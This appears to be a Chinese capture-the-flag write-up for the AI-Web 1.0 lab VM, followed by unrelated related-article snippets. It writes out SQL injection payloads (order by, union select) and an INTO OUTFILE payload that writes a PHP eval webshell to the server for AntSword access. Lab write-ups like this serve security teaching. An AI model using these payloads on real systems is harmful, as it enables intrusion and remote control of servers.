Ai-web 1.0靶场通关攻略

ops/2025/3/6 3:37:48/

1.环境

虚拟机:kali

靶机:ai-web-1.0

2.获取靶机ip

确认靶机ip为192.168.13.160

3.获取绝对路径

用御剑扫描发现两个路径

http://192.168.13.160/robots. txt和http://192.168.13.160/index.html

发现一些路径

用kali的dirb扫描发现一个info.php文件

浏览器访问

获得了网站的绝对路径

4.判断是否存在注入

用dirb扫描另一个路径

发现一个index.php文件,浏览器访问

页面显示提交框,猜测存在sql注入

输入框输入1提交,页面正常,出现回显

输入框输入1'提交,发现报sql语句错,存在sql注入漏洞

5.获取数据库名

使用burpsuite抓包,得到注入点位置。输入1提交抓包

判断列数

' order by 3#

4时出错所以为3列

说明此数据库有三列,下面确定回显位

' union select 1,2,3#

然后获取数据库名称

' union select 1,database(),3#

该数据库名称为 aiweb1

之后sql注入流程,后面可以查询表名,字段名,用户数据等信息。

6.一句话木马上传文件

由于这个网站页面没有登陆框,获取不到用户登陆信息,所以查询数据库数据没有用。

-1' union select 1,<?php @eval($_POST["cmd"]);?>,3 into outfile '/home/www/html/web1x44329002sdf92213/se3reTdir777/uploads/2.php'#

上传成功后路径打开2.php蚁剑连接成功我的找不到路径


http://www.ppmy.cn/ops/163486.html

相关文章

Spring Cloud Alibaba学习 4- Spring Cloud Gateway入门使用

Spring Cloud Alibaba学习 4- Spring Cloud Gateway入门使用 中文文档Spring Cloud Gateway 中文文档 一. 基本使用 1. Predicate配置 1.1 配置参数介绍 直接通过官方给的application.yml介绍&#xff0c;这里就不介绍简写方式了&#xff0c;直接介绍完整方式 spring:clo…

Jedis、Lettuce和Redisson性能设计

一、Jedis源码级学习要点 1. 线程模型与连接管理 阻塞式I/O设计&#xff1a;通过Socket直接建立连接&#xff0c;每个命令发送后线程会阻塞等待响应25连接池实现&#xff1a;JedisPool管理物理连接&#xff0c;避免线程安全问题&#xff0c;核心类GenericObjectPool实现连接复…

Skynet入门(一)

概念 skynet 是一个为网络游戏服务器设计的轻量框架。但它本身并没有任何为网络游戏业务而特别设计的部分&#xff0c;所以尽可以把它用于其它领域。 设计初衷 如何充分利用它们并行运作数千个相互独立的业务。 模块设计建议 在 skynet 中&#xff0c;用服务 (service) 这…

中科大 计算机网络组成原理 1.4 接入网和物理媒体 笔记

一、接入网核心功能与架构 ‌核心作用‌ 接入网是连接用户终端与核心网络的桥梁&#xff0c;承担用户身份认证、带宽分配、数据加密等功能&#xff0c;直接影响网络服务的可靠性和用户体验。例如&#xff0c;杭州电视台的数字人主播通过光纤专线实现零失误新闻播报&#xff0c;…

Unity插件-Mirror使用方法(五)组件介绍(​Network Identity)

目录 一、插件介绍 二、主要组件 Network Manager Network Manager HUD 三、Network Identity 1、组件介绍 2、核心功能 网络唯一标识 同步生命周期 权限管理 组件依赖 3、关键属性与配置 4、基础使用方法 1. 添加与配置 2. 脚本中的访问 5、高级功能与示例 1…

Arm64架构的Linux服务器安装jdk8

一、下载 JDK8 打开浏览器&#xff0c;访问 oracle官网找到适用于自己服务器的 arm64 架构的 JDK8 安装包。 二、安装 JDK8 将下载好的 JDK 压缩包上传到服务器上 解压 JDK 压缩包&#xff1a; tar -zxvf jdk-8uXXX-linux-arm64.tar.gz选择安装目录&#xff0c;我将 JDK 安装…

AI大模型-提示工程学习笔记22-元提示(meta-prompting)

目录 1. 元提示的核心思想 (1) 传统提示的局限性 (2) Meta-Prompting 的解决方案 2. Meta-Prompting 的工作流程 (1) 元提示输入 (2) 提示生成 (3) 提示评估 (可选) (4) 提示选择 (可选) (5) 任务执行 3. Meta-Prompting 的关键组件 (1) 大语言模型 (LLM) (2) 元提…

【数据结构-图】

&#x1f496;&#x1f49d;亲亲&#xff0c; 创作不易 看完点点专注呀♥❤&#x1f495;&#x1f49e; 【图】 目录&#xff1a;图的基本概念与表示方法知识点总结及示例1. 图的定义2. 无向图3. 有向图4. 图的邻接矩阵表示5. 图的邻接表表示 1. 图的邻接矩阵表示有向图邻接矩…